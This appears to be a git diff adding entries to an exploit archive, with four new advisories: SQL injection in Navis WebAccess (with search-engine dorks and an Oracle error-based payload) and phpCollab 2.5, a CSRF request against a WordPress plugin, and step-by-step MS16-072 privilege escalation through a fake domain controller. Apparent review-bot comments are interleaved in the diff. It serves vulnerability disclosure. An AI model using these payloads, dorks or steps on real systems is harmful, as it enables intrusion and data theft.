+40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
+40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
@@ -36366,3 +36366,7 @@ id,file,description,date,author,platform,type,port
 40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
+40216,platforms/jsp/webapps/40216.txt,"Navis WebAccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
+40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
+40219,platforms/windows/local/40219.txt,"Microsoft Windows Group Policy - Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
+40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) CSRF",2016-08-08,"Edwin Molenaar",php,webapps,80
diff --git a/platforms/jsp/webapps/40216.txt b/platforms/jsp/webapps/40216.txt
new file mode 100755
index 000000000..6f10342b3
--- /dev/null
+++ b/platforms/jsp/webapps/40216.txt
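Review bot: In the `@@ -36344` hunk the context row 40195 still reads "Wireshark 2.0.0 to 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service" while 40194 and 40196-40199 on the new side are rewritten to the "2.0.0 - 2.0.4" form, so the six sibling Wireshark entries come out of this commit inconsistent with each other. Normalize it in the same hunk: `+40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 - 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0`. Note also that the new form uses " - " both as the version-range dash and as the product/title separator, so anything that splits the description on the first " - " now sees a different product field for these rows; rows such as 33942 ("4.5.0 < 4.7.0") show the catalog already has a range notation that avoids this, which may be worth preferring.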
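Review bot: The new 40218 row names the product "phpCollab CMS 2.5", while this same commit writes "PHPCollab 2.5" for 37004 (hunk `@@ -33390`) and "phpCollab 2.5" for 37309, 37315 and 37316 (hunks `@@ -33636` and `@@ -33667`), so a product-name search still will not group the five phpCollab entries. Since every one of those rows is touched here, a single spelling is cheap: `+40218,platforms/php/webapps/40218.txt,"phpCollab 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80` and `+37004,platforms/php/webapps/37004.txt,"phpCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0`.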
@@ -0,0 +1,58 @@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+Product -> Navis WebAccess - SQL Injection
+Date -> 8/8/2016
+Author -> bRpsd
+Skype: vegnox
+Vendor HomePage -> http://www.navis.com/
+Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance)
+Product Version -> Express/All
+DBMS -> Oracle
+Tested on > Apache/2.0.54 (Win32)
+
+
+{{ Dorks }}
+
+"Copyright © 2016 Navis, A Zebra Technologies Company"
+"Confidential Information of Navis, A Zebra Technologies Company"
+inurl:GKEY= ext:do
+inurl:/express/secure/Today.jsp
+navis.com webaccess
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+
+ #############
+ |DESCRIPTION|
+ #############
+"Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constitiuents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage."
+
+
+
+Vulnerability: SQL Injection
+File: /express/showNotice.do
+Vul Parameter: GKEY
+
+
+================================================================================================
+Test #1
+
+http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
+
+
+Response Error:
+
+ORA-00933: SQL command not properly ended
+================================================================================================
+
+
+Test #2 => Payload (Proof Of Concept)
+
+http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
+
+
+Response Error:
+
+ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1
+======================================================================================================================================================================================
+
+~
\ No newline at end of file
diff --git a/platforms/php/webapps/40218.txt b/platforms/php/webapps/40218.txt
new file mode 100755
index 000000000..a48586fcf
--- /dev/null
+++ b/platforms/php/webapps/40218.txt
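Review bot: The files.csv row added for 40216 records port 9000, but the only place that value appears in this advisory is the author's `http://localhost:9000` test URLs; nothing in the file states that WebAccess listens on 9000 by default, so the port column may be capturing a lab setup rather than the product (worth confirming before it is relied on for correlation). The advisory also bounds affected versions only as "Express/All" and gives no vendor notification, fix or workaround, which is the part a defender reading the catalog needs most. Both tests rely on raw ORA-* error text being returned to the client, so the actionable guidance is a parameterized (bind-variable) query for `GKEY` in `/express/showNotice.do` and suppression of database error output in HTTP responses; a short "Mitigation" paragraph carrying those two points would make the entry useful beyond reproduction.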
@@ -0,0 +1,176 @@
+Document Title:
+===============
+phpCollab v2.5 CMS - SQL Injection Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1898
+
+
+Release Date:
+=============
+2016-08-08
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1898
+
+
+Common Vulnerability Scoring System:
+====================================
+6.6
+
+
+Product & Service Introduction:
+===============================
+phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet. Those organizations,
+such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab.
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory research team discovered a remote sql-injection web vulnerability in the official phpCollab v2.5 content management system.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-08-08: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+phpCollab Community
+Product: phpCollab - Content Management System 2.5
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A remote sql-injection web vulnerability has been discovered in the official phpCollab v2.5 content management system.
+The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
+
+The sql-injection vulnerability is located in the `id` parameter of the `./phpcollab/users/` module GET method request.
+Remote attackers are able to execute own sql commands by usage of the insecure `emailusers.php` file GET method request.
+The attack vector of the vulnerability is application-side and the request method to inject is GET The vulnerability
+is a classic select remote sql-injection.
+
+The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
+Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
+Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
+
+Request Method(s):
+ [+] GET
+
+Vulnerable Module(s):
+ [+] ./phpcollab/users/
+
+Vulnerable File(s):
+ [+] emailusers.php
+
+Vulnerable Parameter(s):
+ [+] id
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
+For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Exploitation
+http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1'[SQL-INJECTION VULNERABILITY!]&&PHPSESSID=ghtu76jt276nji04lua07930t5
+
+
+--- Error Exception Logs [SQL] ---
+You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
+-
+You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2
+-
+You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1%27&&PHPSESSID=ghtu76jt276nji04lua07930t5
+Mime Type[text/html]
+ Request Header:
+ Host[phpcollab.localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
+ Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470586689.1470585617.;
+ _pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fphpcollab.localhost:8080%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*]
+ Connection[keep-alive]
+ Cache-Control[max-age=0]
+ Response Header:
+ Server[nginx/1.2.1]
+ Content-Type[text/html]
+ Transfer-Encoding[chunked]
+ Connection[keep-alive]
+ X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]
+
+
+Reference(s):
+http://phpcollab.localhost:8080/
+http://phpcollab.localhost:8080/phpcollab/
+http://phpcollab.localhost:8080/phpcollab/users/
+http://phpcollab.localhost:8080/phpcollab/users/emailusers.php
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by usage of a prepared statement in the emailusers.php file GET method request.
+Disallow special chars and escape the input and outpit context entries to prevent further sql-injection attacks.
+
+
+Security Risk:
+==============
+The security risk of the remote sql-injection web vulnerability in the id parameter of the emailusers.php file is estimated as high. (CVSS 6.6)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
+including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
+including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
+of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
+limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
+redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
+its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
+authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
+
+ Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+
diff --git a/platforms/php/webapps/40220.txt
new file mode 100755
index 000000000..002719bde
--- /dev/null
+++ b/platforms/php/webapps/40220.txt
@@ -0,0 +1,51 @@
+Cross-Site Request Forgery vulnerability in Add From Server WordPress Plugin
+
+Abstract
+
+It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). An attacker can use this issue to add illegal content to the victims server, or add very large files to the victim's server to exaust the amount of avalible disk space.
+
+Contact
+
+For feedback or questions about this advisory mail us at sumofpwn at securify.nl
+
+The Summer of Pwnage
+
+This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
+
+OVE ID
+
+OVE-20160718-0004
+
+Tested versions
+
+These issues were successfully tested on Add From Server WordPress Plugin version 6.2.
+
+Fix
+
+This issue is resolved in Add From Server version 3.3.2.
+
+Introduction
+
+The Add From Server WordPress Plugin is a quick plugin, which allows you to import media & files into the WordPress uploads manager from (remote) webservers. It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). Because of this,
+the following attack scenario's could be possible:
+
+- Adding illegal content to the victim's server.
+- Adding very large files to the victim's server to exaust the amount of avalible disk space.
+
+Details
+
+When a (media) file is added from the server, the source is not validated. This means that not only files from the localhost can be added, but also from other sources. The affected code is not protected with an anti-Cross-Site Request Forgery token.
+
+The function handle_imports() only removes slashes. The vulnerability exists in the file add-from-server/class.add-from-server.php (line 213). Because slashes are removed, the file that will be uploaded must exist in the server root. For example: www.example.com/largefile.txt
+
+The host and filename will be set in a separate parameter, so no slashes are needed.
+
+Proof of concept
+
+POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
+Host:
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
\ No newline at end of file
diff --git a/platforms/windows/local/40219.txt
new file mode 100755
index 000000000..ae42bb37f
--- /dev/null
+++ b/platforms/windows/local/40219.txt
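Review bot: The "Tested versions" and "Fix" sections of this advisory contradict each other — the issue is reported as tested on Add From Server 6.2 but resolved in version 3.3.2, a lower number, so a defender reading it cannot tell which release actually carries the fix. Presumably one of the two version strings is a typo; the fixed-version line should be corrected to a release that is newer than the tested one, e.g. `This issue is resolved in Add From Server version [FIXED_VERSION_PLACEHOLDER].`, after checking the plugin's changelog. It would also help detection and triage to name the function that lacks the nonce check, since the text points to `handle_imports()` in class.add-from-server.php (line 213) only for the slash stripping and never states where the missing CSRF token check belongs.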
@@ -0,0 +1,42 @@
+# Exploit Title: Group Policy Elevation of Privilege Vulnerability
+# Date: 08-08-2016
+# Exploit Author: Nabeel Ahmed
+# Tested on: Windows 7 Professional (x32/x64)
+# CVE : CVE-2016-3223
+# Category: Privilege Escalation
+
+SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials)
+SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies.
+
+1) Prerequisites:
+ - Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local)
+ - Domain User Credentials are known with no Administrative rights.
+ - Computer has to be connected on a network.
+ - Fake Domain Controller
+
+2) Reproduce:
+ STEP 1: Determine domain of the target computer (e.g. domain.local)
+ STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1)
+ STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
+ STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!).
+ STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials).
+ STEP 6: Establish network connection between the target system and the newly created Domain Controller.
+ STEP 7: Create a Group Policy called "Create Local Admin"
+ STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators".
+ STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force"
+ STEP 10: User Policy update will complete successfully.
+ STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators"
+ STEP 12: "TestAdmin" user will be member of the Administrators group.
+
+3) Impact:
+ A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller
+
+4) Solution:
+ Install the latest patches from 14-06-2016 using Windows Update.
+
+5) References:
+ https://technet.microsoft.com/en-us/library/security/ms16-072.aspx
+ https://support.microsoft.com/en-us/kb/3163622
+
+6) Credits:
+ Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com)